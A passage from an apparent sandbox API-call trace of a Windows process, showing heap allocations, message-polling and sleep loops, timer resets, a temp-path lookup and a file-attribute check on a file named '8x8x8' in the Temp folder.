PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0303.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0303.216] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0303.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0303.216] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0303.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0303.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0303.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0303.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0303.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0303.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0303.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0303.217] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.218] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0303.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.219] timeGetTime () returned 0x4bbed [0303.219] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.219] Sleep (dwMilliseconds=0xa) [0303.233] timeGetTime () returned 0x4bbfd [0303.233] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.233] Sleep (dwMilliseconds=0xa) [0303.249] timeGetTime () returned 0x4bc0d [0303.249] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.249] Sleep (dwMilliseconds=0xa) [0303.264] timeGetTime () returned 0x4bc1c [0303.264] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.264] Sleep (dwMilliseconds=0xa) [0303.280] timeGetTime () returned 0x4bc2c [0303.280] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.280] Sleep (dwMilliseconds=0xa) [0303.296] timeGetTime () returned 0x4bc3b [0303.296] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.296] Sleep (dwMilliseconds=0xa) [0303.311] timeGetTime () returned 0x4bc4b [0303.311] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.311] Sleep (dwMilliseconds=0xa) [0303.327] timeGetTime () returned 0x4bc5b [0303.327] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.327] Sleep (dwMilliseconds=0xa) [0303.342] timeGetTime () returned 0x4bc6a [0303.342] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.342] Sleep (dwMilliseconds=0xa) [0303.358] timeGetTime () returned 0x4bc7a [0303.358] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.358] Sleep (dwMilliseconds=0xa) [0303.374] timeGetTime () returned 0x4bc89 [0303.374] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.374] Sleep (dwMilliseconds=0xa) [0303.389] timeGetTime () returned 0x4bc99 [0303.389] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.389] Sleep (dwMilliseconds=0xa) [0303.405] timeGetTime () returned 0x4bca9 [0303.405] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.405] Sleep (dwMilliseconds=0xa) [0303.420] timeGetTime () returned 0x4bcb8 [0303.420] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.420] Sleep (dwMilliseconds=0xa) [0303.436] timeGetTime () returned 0x4bcc8 [0303.436] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.436] Sleep (dwMilliseconds=0xa) [0303.452] timeGetTime () returned 0x4bcd7 [0303.452] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.452] Sleep (dwMilliseconds=0xa) [0303.470] timeGetTime () returned 0x4bce7 [0303.470] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.470] Sleep (dwMilliseconds=0xa) [0303.483] timeGetTime () returned 0x4bcf7 [0303.483] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.483] Sleep (dwMilliseconds=0xa) [0303.499] timeGetTime () returned 0x4bd06 [0303.499] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.499] Sleep (dwMilliseconds=0xa) [0303.514] timeGetTime () returned 0x4bd16 [0303.514] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.514] Sleep (dwMilliseconds=0xa) [0303.530] timeGetTime () returned 0x4bd25 [0303.530] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.530] Sleep (dwMilliseconds=0xa) [0303.545] timeGetTime () returned 0x4bd35 [0303.545] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.545] Sleep (dwMilliseconds=0xa) [0303.561] timeGetTime () returned 0x4bd45 [0303.561] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.561] Sleep (dwMilliseconds=0xa) [0303.576] timeGetTime () returned 0x4bd54 [0303.577] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.577] Sleep (dwMilliseconds=0xa) [0303.592] timeGetTime () returned 0x4bd64 [0303.592] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.592] Sleep (dwMilliseconds=0xa) [0303.608] timeGetTime () returned 0x4bd73 [0303.608] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.608] Sleep (dwMilliseconds=0xa) [0303.623] timeGetTime () returned 0x4bd83 [0303.623] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.623] Sleep (dwMilliseconds=0xa) [0303.639] timeGetTime () returned 0x4bd93 [0303.639] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.639] Sleep (dwMilliseconds=0xa) [0303.654] timeGetTime () returned 0x4bda2 [0303.654] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.654] Sleep (dwMilliseconds=0xa) [0303.670] timeGetTime () returned 0x4bdb2 [0303.670] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.670] Sleep (dwMilliseconds=0xa) [0303.686] timeGetTime () returned 0x4bdc1 [0303.686] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.686] Sleep (dwMilliseconds=0xa) [0303.701] timeGetTime () returned 0x4bdd1 [0303.701] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.701] Sleep (dwMilliseconds=0xa) [0303.717] timeGetTime () returned 0x4bde1 [0303.717] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.717] Sleep (dwMilliseconds=0xa) [0303.732] timeGetTime () returned 0x4bdf0 [0303.732] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0303.732] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0303.732] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0303.732] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0303.733] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0303.733] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.733] Sleep (dwMilliseconds=0xa) [0303.748] timeGetTime () returned 0x4be00 [0303.748] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.748] Sleep (dwMilliseconds=0xa) [0303.764] timeGetTime () returned 0x4be0f [0303.764] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.764] Sleep (dwMilliseconds=0xa) [0303.779] timeGetTime () returned 0x4be1f [0303.779] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.779] Sleep (dwMilliseconds=0xa) [0303.796] timeGetTime () returned 0x4be2f [0303.796] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.796] Sleep (dwMilliseconds=0xa) [0303.810] timeGetTime () returned 0x4be3e [0303.810] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.811] Sleep (dwMilliseconds=0xa) [0303.826] timeGetTime () returned 0x4be4e [0303.826] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.826] Sleep (dwMilliseconds=0xa) [0303.842] timeGetTime () returned 0x4be5d [0303.842] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.842] Sleep (dwMilliseconds=0xa) [0303.860] timeGetTime () returned 0x4be6d [0303.860] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.860] Sleep (dwMilliseconds=0xa) [0303.873] timeGetTime () returned 0x4be7d [0303.873] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.873] Sleep (dwMilliseconds=0xa) [0303.889] timeGetTime () returned 0x4be8c [0303.889] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.889] Sleep (dwMilliseconds=0xa) [0303.904] timeGetTime () returned 0x4be9c [0303.904] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.904] Sleep (dwMilliseconds=0xa) [0303.951] timeGetTime () returned 0x4becb [0303.951] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.951] Sleep (dwMilliseconds=0xa) [0303.998] timeGetTime () returned 0x4bef9 [0303.998] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0303.998] Sleep (dwMilliseconds=0xa) [0304.046] timeGetTime () returned 0x4bf28 [0304.046] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.046] Sleep (dwMilliseconds=0xa) [0304.087] timeGetTime () returned 0x4bf47 [0304.087] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.087] Sleep (dwMilliseconds=0xa) [0304.122] timeGetTime () returned 0x4bf76 [0304.122] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.122] Sleep (dwMilliseconds=0xa) [0304.169] timeGetTime () returned 0x4bfa5 [0304.169] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.169] Sleep (dwMilliseconds=0xa) [0304.197] timeGetTime () returned 0x4bfb5 [0304.197] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.197] Sleep (dwMilliseconds=0xa) [0304.200] timeGetTime () returned 0x4bfc4 [0304.200] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.200] Sleep (dwMilliseconds=0xa) [0304.216] timeGetTime () returned 0x4bfd4 [0304.216] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.216] Sleep (dwMilliseconds=0xa) [0304.232] timeGetTime () returned 0x4bfe3 [0304.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0304.232] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0304.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0304.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0304.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0304.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0304.233] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0304.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0304.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0304.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0304.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0304.234] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0304.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0304.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0304.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.234] HeapFree (in: hHeap=0x25c0000, 